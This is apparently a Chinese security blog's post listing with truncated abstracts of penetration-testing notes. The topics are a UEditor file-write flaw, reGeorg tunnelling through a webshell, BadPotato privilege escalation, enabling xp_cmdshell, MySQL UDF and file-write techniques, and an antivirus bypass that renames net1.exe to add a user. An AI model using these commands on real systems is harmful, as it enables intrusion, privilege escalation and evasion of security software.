摘要:
···漏洞原理 在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞 ··· 访问/uedit/net/controller.ashx?action=catchimage 若存在抓取源报错,则存在漏洞 本地构造上传文件 <form action="http://xxx.xxx.xxx.xx 阅读全文
posted @ 2021-11-17 17:44
Light_Wind
阅读(611)
评论(0)
推荐(0)
摘要:
应用场景 目标不出网 作用 正向代理,通过webshell将流量带入内网 regeorg 项目地址 https://github.com/sensepost/reGeorg 使用方法 1、上传 tunnel.(aspx|ashx|jsp|php) 到目标web路径 2、本地 python3 reGe 阅读全文
posted @ 2021-07-19 11:38
Light_Wind
阅读(631)
评论(0)
推荐(0)
摘要:
项目地址 https://github.com/BeichenDream/BadPotato 代码copy下来,本地VS2019生成EXE 生成-》生成badpotato 项目地址中会生成badpotato.exe useage (当然,要存在ms16-075) 阅读全文
posted @ 2021-07-08 16:45
Light_Wind
阅读(1620)
评论(0)
推荐(0)
摘要:
开启xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure; 执行命令 EXEC master.dbo.xp_cmdshel 阅读全文
posted @ 2021-07-08 16:20
Light_Wind
阅读(209)
评论(0)
推荐(0)
摘要:
一、基本函数学习 1、VirtualAlloc函数 用来动态申请内存,通常用来分配大块的内存 VirtualAlloc是一个Windows API函数,它包含在windows系统文件Kernel32.dll中使用时要引用windows.h 该函数的功能是在调用进程的虚地址空间,预定或者提交一部分页 阅读全文
posted @ 2021-06-29 15:48
Light_Wind
阅读(356)
评论(0)
推荐(0)
摘要:
火绒对添加用户操作拦截 bypass copy c:\windows\system32\net1.exe aaa.txt aaa.txt user xxx 123456 /add 阅读全文
posted @ 2021-06-07 18:20
Light_Wind
阅读(930)
评论(0)
推荐(0)
摘要:
UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充。原理是添加一个能执行系统命令的函数。 前提 secure_file_priv为空,支持导入导出 show global variables like 'secure%'; 一、导入 阅读全文
posted @ 2021-06-06 18:55
Light_Wind
阅读(153)
评论(0)
推荐(0)
摘要:
方式一: 条件: 对web目录有写权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置 –secure-file-priv(secure-file-priv=空) show global variables like '%secure%'; ##查看secure-fi 阅读全文
posted @ 2021-06-03 23:45
Light_Wind
阅读(1999)
评论(0)
推荐(0)
浙公网安备 33010602011771号